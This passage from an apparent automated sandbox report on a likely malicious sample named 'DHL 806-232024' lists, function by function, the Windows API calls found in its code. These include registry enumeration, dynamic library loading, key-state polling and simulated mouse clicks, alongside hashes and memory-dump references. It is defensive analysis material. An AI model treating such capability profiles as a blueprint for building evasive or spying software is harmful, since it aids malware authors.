                                                                                  • Opcode ID: 4ed4dcbf88ef53b227b11285972d510a1f8f15a128a272a86746e29ef97411a4
                                                                                  • Instruction ID: 201d8669a9bd9e12d6e4df284ae95ea1e1a17200e83fc962b93b6f49050dffab
                                                                                  • Opcode Fuzzy Hash: 4ed4dcbf88ef53b227b11285972d510a1f8f15a128a272a86746e29ef97411a4
                                                                                  • Instruction Fuzzy Hash: 601179309042098FCF24EFA8D8904BEB3B5FF16300F10896AD851A7362EB36690ACF51
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0094EF1B
                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0094EF4B
                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0094F07E
                                                                                  • CloseHandle.KERNEL32(?), ref: 0094F0FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2364364464-0
                                                                                  • Opcode ID: d9aeb0b668fa41c08907052901e40be85100a824e394705be0d40a926deb8cd0
                                                                                  • Instruction ID: 467aadc1ec105f4c55ad972a96e7999fbf47fee9379c90db78c913f08114a26b
                                                                                  • Opcode Fuzzy Hash: d9aeb0b668fa41c08907052901e40be85100a824e394705be0d40a926deb8cd0
                                                                                  • Instruction Fuzzy Hash: 1D813D716043119FD720EF29C856F2AB7E5FF88720F14895EF595DB392DA70AC408B52
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 1559183368-0
                                                                                  • Opcode ID: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
                                                                                  • Instruction ID: bdb2862f83c6b5eacb373f09f0aaa778903c3b0d64c1cedab98b821125e2928f
                                                                                  • Opcode Fuzzy Hash: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
                                                                                  • Instruction Fuzzy Hash: 09519C30A00B0DDBDB24AEB9888467EB7A5FF50324F648629FB35D62D0DB749E518B50
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950388
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009503C7
                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0095040E
                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 0095043A
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00950447
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 3440857362-0
                                                                                  • Opcode ID: 08222471ca3b9b7bf86b1c4e04b59ad19d0d6889c627d23e7ebcc684a13a8a02
                                                                                  • Instruction ID: 09bab635fd8702d38f21ab8932a77ec96eb4e1f64d772ea21dbdf5cbe180f17d
                                                                                  • Opcode Fuzzy Hash: 08222471ca3b9b7bf86b1c4e04b59ad19d0d6889c627d23e7ebcc684a13a8a02
                                                                                  • Instruction Fuzzy Hash: 42514E31108204AFD704EF69D891F6EB7E8FF84315F04891EF995872A1DB31E908DB52
                                                                                  APIs
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0094DC3B
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0094DCBE
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0094DCDA
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0094DD1B
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0094DD35
                                                                                    • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
                                                                                    • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 327935632-0
                                                                                  • Opcode ID: 880ff486219500fdc9ac7cda604ea12aa912d2fb864d44906db23928b4bb4c40
                                                                                  • Instruction ID: 611be3238d34781e0345b547301e0541dacc5d54cef7a411ecedcae1a353ae3a
                                                                                  • Opcode Fuzzy Hash: 880ff486219500fdc9ac7cda604ea12aa912d2fb864d44906db23928b4bb4c40
                                                                                  • Instruction Fuzzy Hash: 4F512839A04605EFCB00EF68C494DADB7F4FF49321B04816AE855AB351DB30AD45CB91
                                                                                  APIs
                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0093E88A
                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0093E8B3
                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0093E8F2
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0093E917
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0093E91F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1389676194-0
                                                                                  • Opcode ID: 6deb3c979c841cc17996aee58b86825037f411f6f753ae4d4e9652ad9e41f036
                                                                                  • Instruction ID: 5dcbc9edcc68c3844fd12bb3ff1b5750064024c74d53806eef89cae91e3a0db9
                                                                                  • Opcode Fuzzy Hash: 6deb3c979c841cc17996aee58b86825037f411f6f753ae4d4e9652ad9e41f036
                                                                                  • Instruction Fuzzy Hash: FC510935A00215EFCB01EF69C991AAEBBF5FF08310F1480A9E849AB361DB31AD51DF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 71bfaf0f0f3b2c27485b0496cd987908e2c8857dfebeebb6128914124b5c8c96
                                                                                  • Instruction ID: d5845f388459736b7d8fe1652fdd5377d732c942b428882e6ae93eca7f30b005
                                                                                  • Opcode Fuzzy Hash: 71bfaf0f0f3b2c27485b0496cd987908e2c8857dfebeebb6128914124b5c8c96
                                                                                  • Instruction Fuzzy Hash: FD410135904204AFC720DF6ACC58FA9BBA8FB09326F140365FC55A72E0D770AE49DB59
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 008D2357
                                                                                  • ScreenToClient.USER32(009967B0,?), ref: 008D2374
                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 008D2399
                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 008D23A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                  • String ID:
                                                                                  • API String ID: 4210589936-0
                                                                                  • Opcode ID: 479d0b78e1ad051b8e2e75c613acd7681a1c4d5f626c683cdcb3f4f0884f1e98
                                                                                  • Instruction ID: c07e74e3ee606e593a58441710734f1992d2201dddba65fb887b50e0526ce138
                                                                                  • Opcode Fuzzy Hash: 479d0b78e1ad051b8e2e75c613acd7681a1c4d5f626c683cdcb3f4f0884f1e98
                                                                                  • Instruction Fuzzy Hash: 10417C75508219FFDB199F69C844AEABB74FB45360F20435AF828E23A0C734A994DB91
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092695D
                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 009269A9
                                                                                  • TranslateMessage.USER32(?), ref: 009269D2
                                                                                  • DispatchMessageW.USER32(?), ref: 009269DC
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009269EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                  • String ID:
                                                                                  • API String ID: 2108273632-0
                                                                                  • Opcode ID: 12b012e6b968601877977ced2b985863cb0de75387f986c2f0f912a487b389fe
                                                                                  • Instruction ID: 1acbef16926005580111ac9a2205c5fb25590bcb3d91f4555bb69ac2f4ae06ab
                                                                                  • Opcode Fuzzy Hash: 12b012e6b968601877977ced2b985863cb0de75387f986c2f0f912a487b389fe
                                                                                  • Instruction Fuzzy Hash: 89313931919326AFDB20CF79EC84FB67BACAB01310F14456AE421D38A4DB34D8C9E790
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00928F12
                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00928FBC
                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00928FC4
                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00928FD2
                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00928FDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3382505437-0
                                                                                  • Opcode ID: beff1b03b2a0516174f3269eca9c3c8ddd02678ea1f8fbe9022df4705a6bcfc9
                                                                                  • Instruction ID: fe005f2f5813a26915d564289b2dcbbb40ba874b726d555a3575b40e4c1f33ba
                                                                                  • Opcode Fuzzy Hash: beff1b03b2a0516174f3269eca9c3c8ddd02678ea1f8fbe9022df4705a6bcfc9
                                                                                  • Instruction Fuzzy Hash: C231EE71505229EFDB00CF68EA4CADF7BBAEB04326F104229F924EB1D4C7B09914DB90
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 0092B6C7
                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0092B6E4
                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0092B71C
                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0092B742
                                                                                  • _wcsstr.LIBCMT ref: 0092B74C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                  • String ID:
                                                                                  • API String ID: 3902887630-0
                                                                                  • Opcode ID: ddf581415ef4ee46d19d0acccd525a542477308e7a980627d4b25aaeb68ead8c
                                                                                  • Instruction ID: 356487c47d4dc5b8082f5676ed65c9e28179809df8dcac9dd8a95fcfe14de290
                                                                                  • Opcode Fuzzy Hash: ddf581415ef4ee46d19d0acccd525a542477308e7a980627d4b25aaeb68ead8c
                                                                                  • Instruction Fuzzy Hash: 9121F932205258BBEB255B39AC49E7B7BECEF85721F104039FD05CA1A5EF61DC409761
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0095B44C
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0095B471
                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0095B489
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0095B4B2
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00941184,00000000), ref: 0095B4D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2294984445-0
                                                                                  • Opcode ID: ce71c3d6ee845132f29c19637d634e3050090fff6ee36d8bbb6fbb3fb1adfe0e
                                                                                  • Instruction ID: 930126f99ea25d8090172e8131c241c1d4feb44e9eb54652e0dee2aa0c394a67
                                                                                  • Opcode Fuzzy Hash: ce71c3d6ee845132f29c19637d634e3050090fff6ee36d8bbb6fbb3fb1adfe0e
                                                                                  • Instruction Fuzzy Hash: AD218031524215AFCB20DF3ACC48A6A37A8EB05732F154B29FD26C71F1E7309855DB80
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00929802
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00929834
                                                                                  • __itow.LIBCMT ref: 0092984C
                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00929874
                                                                                  • __itow.LIBCMT ref: 00929885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2983881199-0
                                                                                  • Opcode ID: 2b4ffc16647450a425ef18aa4813cb4ad68360aed9d7535fd03ca8c8cb1a8911
                                                                                  • Instruction ID: 595851084b7b89222d4ed821da1a2f6604e765eb53e7396b9b68791de569d119
                                                                                  • Opcode Fuzzy Hash: 2b4ffc16647450a425ef18aa4813cb4ad68360aed9d7535fd03ca8c8cb1a8911
                                                                                  • Instruction Fuzzy Hash: 2A210731B00218ABDB10AA759C86EEE3BADEF4A724F080035FD05DB245E6708D459792
                                                                                  APIs
                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
                                                                                  • SelectObject.GDI32(?,00000000), ref: 008D135C
                                                                                  • BeginPath.GDI32(?), ref: 008D1373
                                                                                  • SelectObject.GDI32(?,00000000), ref: 008D139C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                  • String ID:
                                                                                  • API String ID: 3225163088-0
                                                                                  • Opcode ID: 4022d698002c35d9af9d758aebb506fee5c4994f6bd4c3713fb9da96d0d132e4
                                                                                  • Instruction ID: 12c5776058c5ff15cc563cc58bd6a682d5ca09a2bb2472ffbec4109ebe3f4a13
                                                                                  • Opcode Fuzzy Hash: 4022d698002c35d9af9d758aebb506fee5c4994f6bd4c3713fb9da96d0d132e4
                                                                                  • Instruction Fuzzy Hash: 3A213A70828308EFDF159F2ADC087A97BB9FB10366F148327F814D66A0D7759991EB90
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 2931989736-0
                                                                                  • Opcode ID: ad877e83ff1a72d83bd0bef4af1bc62ef3ff6eaf6283b4d57ab08c0f3c61d012
                                                                                  • Instruction ID: a519a8cc4bda5a7eb563719aeafc98025492f98413cb730c30fb6a68d130ac77
                                                                                  • Opcode Fuzzy Hash: ad877e83ff1a72d83bd0bef4af1bc62ef3ff6eaf6283b4d57ab08c0f3c61d012
                                                                                  • Instruction Fuzzy Hash: CD0192E16085297BE604A7246C47EBF675CEF7139CB444121FE04E6287E6599E2182E1
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00934D5C
                                                                                  • __beginthreadex.LIBCMT ref: 00934D7A
                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00934D8F
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00934DA5
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00934DAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                  • String ID:
                                                                                  • API String ID: 3824534824-0
                                                                                  • Opcode ID: ad547d89eae25207a04efccd655237fd9ce7e9c950d469d607f034b90529d7b5
                                                                                  • Instruction ID: ebbc1c9f8f23f714df34ac3e1be2bc99787feeb9700c553fc6eb2c5de2be0f22
                                                                                  • Opcode Fuzzy Hash: ad547d89eae25207a04efccd655237fd9ce7e9c950d469d607f034b90529d7b5
                                                                                  • Instruction Fuzzy Hash: B9110876918608BBC7019BBC9C04A9F7FACEB85321F144266F924D3290D6759D009BA1
                                                                                  APIs
                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
                                                                                  • GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
                                                                                  • HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D
                                                                                  Memory Dump Source
